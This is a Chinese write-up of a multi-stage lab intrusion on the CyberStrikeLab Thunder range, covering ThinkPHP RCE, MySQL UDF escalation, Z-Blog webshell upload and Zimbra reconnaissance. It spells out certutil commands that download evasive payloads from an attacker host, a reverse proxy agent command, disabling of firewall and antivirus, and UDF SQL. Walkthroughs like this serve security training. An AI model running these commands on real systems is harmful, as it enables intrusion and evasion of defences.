CyberStrikeLab - Thunder靶场 📅 2026/8/9 4:11:04 一、第一层连接 OpenVPN 后如果无法直接访问靶机需要手动添加路由将目标网段的流量走 VPN 接口sudo ip route add 172.20.56.0/24 dev tun01.2 信息收集访问目标网站发现是ThinkPHP框架1.3 漏洞扫描直接上 ThinkPHP 检测工具ThinkPHP 5.0.22/5.1.29 远程代码执行RCE漏洞ThinkPHP 5 文件包含漏洞ThinkPHP 5.x 数据库信息泄露1.4 漏洞利用利用 ThinkPHP 5.0.22/5.1.29 RCE 漏洞尝试写入一句话木马发现连接失败感觉像被杀软删了。检查后发现目标机器装有360 和 Windows Defender但可以出网。既然 webshell 落地就被杀那就直接通过 RCE 远程下载免杀木马上线certutil.exe -urlcache -split -f http://172.16.233.2:5000/10.exe下载成功CS 成功上线1.5 权限提升查看当前用户权限发现具备土豆Potato系列提权的条件使用 BadPotato 进行提权抓取到管理员明文密码可以选择远程桌面登录关杀软这些我就简单一点添加信任文件夹避免后续上传的工具被杀关闭防火墙方便内网通信1.8 搭建代理上传 Stowaway 搭建 Socks 代理配合 Proxifier 将本地流量导入内网二、第二层2.1 内网信息收集拿下第一台机器后开始进行内网信息收集。上传 fscan 扫描内网start infoscan (icmp) Target 172.20.57.98 is alive [*] Icmp alive hosts len is: 1 172.20.57.98:139 open 172.20.57.98:135 open 172.20.57.98:445 open 172.20.57.98:3306 open 172.20.57.98:3389 open [*] NetInfo [*]172.20.57.98 [-]WIN-J2B9EIUKEN3 [-]172.20.57.98 [-]10.0.0.65 [*] NetBios 172.20.57.98 WORKGROUP\WIN-J2B9EIUKEN3 Windows Server 2016 Standard 14393发现一台双网卡主机172.20.57.98 和 10.0.0.65使用tscan常用弱口令字典对 3306 和 3389 进行爆破常规字典未能成功。手工尝试 CyberStrike 靶场常用的弱口令root / cslab成功登录 MySQLtscan 内置字典没有这个密码可以自行添加在数据库中找到了用户账号密码但密码经过了盐加密处理先放着后面的guid就是用的这个2.4 MySQL UDF 提权检查 MySQL 配置确认满足 UDF 提权条件secure_file_priv为空允许任意路径读写MySQL 以高权限运行这里使用 sqlmap 自带的 UDF 文件进行提权。如果将 dll 转为十六进制写入时遇到加密切换问题可先用 cloak 解码python /usr/share/sqlmap/extra/cloak/cloak.py -d -i lib_mysqludf_sys.dll -o udf.dll写入 dll 文件到 MySQL 插件目录SELECT 0x... INTO DUMPFILE C:\\Program Files\\MySQL\\MySQL Server 5.7\\lib\\plugin\\udf.dll;创建函数 create function sys_exec returns string soname udf.dll;2.5 上线与提权查看进程发现有 Defender但可以出网。同样的思路通过 UDF 执行系统命令远程下载免杀木马由于第二台机器在内网需要通过第一台做端口转发才能让木马回连做一个转发上线生成免杀马在第二台执行下载并运行SELECT sys_exec(certutil.exe -urlcache -split -f http://172.16.233.2:5000/20.exe);SELECT sys_exec(certutil.exe -urlcache -split -f http://172.16.233.2:5000/20.bin);我CS 内置插件提权全都不行做了个免杀版 BadPotato 成功提权至 SYSTEM2.6 权限维持与代理搭建添加信任文件夹关闭防火墙上传 fscan 和 Stowaway 搭建第二级 Socks 代理配置 Proxifier 代理链三、第三层3.1 内网信息收集通过第二台机器的代理使用 fscan 扫描10.0.0.0/24网段10.0.0.34:80 是一个Z-Blog后台登录页面。存在 Nday 文件上传漏洞但需要先登录后台。这时想到第二台主机 MySQL 中泄露的加密密码。找到 Z-Blog 源码中的密码加密算法参考源码https://github.com/zblogcn/zblogphp/blob/master/zb_system/function/lib/base/member.php由于 MySQL 是 root 权限可以直接修改数据库。构造新密码123456的密文替换原密码MD5( MD5(123456) guid )使用新密码成功登录后台利用 Z-Blog 文件上传漏洞上传 webshell参考exphttps://github.com/fengyijiu520/Z-Blog-蚁剑连接 webshell3.4 权限提升查找可提权的 SUID 文件发现可利用的二进制文件。上传 Stowaway 并赋予执行权限在write.sh文件中加入/xp/www//zb_users/theme/shell/template/linux_x64_agent -c 10.0.0.65:10000 -s 123通过 SUID 文件以 root 权限执行连接命令成功提权。搭建第三级 Socks 代理四、第四层 · Zimbra Nday4.1 信息收集通过第三台机器的代理使用 fscan 扫描10.1.1.0/24网段10.1.1.56:443 open 10.1.1.56:22 open 10.1.1.56:7071 open 10.1.1.56:8443 open访问 Web 界面发现是Zimbra邮件系统4.2 漏洞利用找到一个Zimbra的RCE找到参考文章https://cloud.tencent.com/developer/article/1752450